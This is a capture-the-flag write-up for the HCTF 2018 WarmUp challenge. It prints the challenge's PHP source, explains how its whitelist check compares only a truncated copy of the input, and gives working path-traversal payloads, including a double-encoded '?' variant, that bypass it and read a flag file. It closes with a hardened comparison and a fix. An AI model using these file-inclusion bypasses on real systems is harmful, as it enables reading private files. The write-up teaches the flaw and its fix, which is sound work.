[HCTF 2018]WarmUp
The page shows nothing but an image. Viewing the page source reveals the file source.php, which contains the following code:
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Code audit
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
Pass in a 'file' parameter that is non-empty, is a string, and satisfies checkFile(), and the file gets included.
public static function checkFile(&$page)
{
    $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
    if (! isset($page) || !is_string($page)) { // non-empty strings pass
        echo "you can't see it";
        return false;
    }

    if (in_array($page, $whitelist)) { // check whether it is in the whitelist
        return true;
    }

    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?') // find the index of the first '?'
    ); // keep only the characters before the '?'
    if (in_array($_page, $whitelist)) { // check whether the truncated value is in the whitelist
        return true;
    }

    $_page = urldecode($page); // URL-decode
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    echo "you can't see it";
    return false;
}
After analysis the function's behavior is clear: only one of the three checks needs to return true for the file to be included, and the later checks compare a truncated (or decoded and truncated) copy against the whitelist while include receives the original $_REQUEST['file'] unchanged.
Visiting hint.php gives the hint: flag not here, and flag in ffffllllaaaagggg
Guessing this is directory traversal.
Construct the payload:
/source.php?file=hint.php?../../../../../ffffllllaaaagggg
or, with the '?' double-encoded so that it survives PHP's own decoding of the request parameter and only becomes '?' inside checkFile()'s urldecode():
/source.php?file=hint.php%253F../../../../../ffffllllaaaagggg
It worked.
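To make the audit concrete, here is an added example (not part of the writeup or the challenge) that runs the checkFile() logic beside a strict variant on constructed inputs, so the gap between "what is checked" and "what is included" is visible; the function names weakCheck and strictResolve are my own.

```php
<?php
// Added example, not part of the original writeup or challenge code.
// It reproduces the challenge's checkFile() comparison (without the echo and
// include) beside a strict variant, on constructed inputs, to show why the
// prefix-based check is not a whitelist for what include() receives.

$whitelist = ["source" => "source.php", "hint" => "hint.php"];

// Challenge logic: compares only the part before the first '?' (once as-is,
// once after an extra urldecode) with the whitelist; the caller then
// includes the ORIGINAL, unmodified string.
function weakCheck(string $page, array $whitelist): bool {
    if (in_array($page, $whitelist, true)) return true;
    $cut = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($cut, $whitelist, true)) return true;
    $dec = urldecode($page);
    $cut = mb_substr($dec, 0, mb_strpos($dec . '?', '?'));
    return in_array($cut, $whitelist, true);
}

// Hardened variant: exact match only, and the caller includes the value
// taken from the map, never the user-supplied string.
function strictResolve(string $page, array $whitelist): ?string {
    $key = array_search($page, $whitelist, true);
    return $key === false ? null : $whitelist[$key];
}

// Constructed inputs as they would appear in $_REQUEST['file'] (PHP has
// already URL-decoded the query string once, so %253F arrives as %3F).
$inputs = [
    "hint.php",                                    // exact whitelist value
    "hint.php?../../../../../ffffllllaaaagggg",    // '?' truncation
    "hint.php%3F../../../../../ffffllllaaaagggg",  // '?' after second decode
    "hint.php/../../../../../ffffllllaaaagggg",    // no '?' at all
];
foreach ($inputs as $in) {
    printf("%-45s weak=%-6s strict=%s\n", $in,
        weakCheck($in, $whitelist) ? "pass" : "reject",
        strictResolve($in, $whitelist) ?? "reject");
}
```

The fix that matters is in the caller: include the string returned from the map rather than $_REQUEST['file'], so even a check that passes can only ever load one of the two listed files.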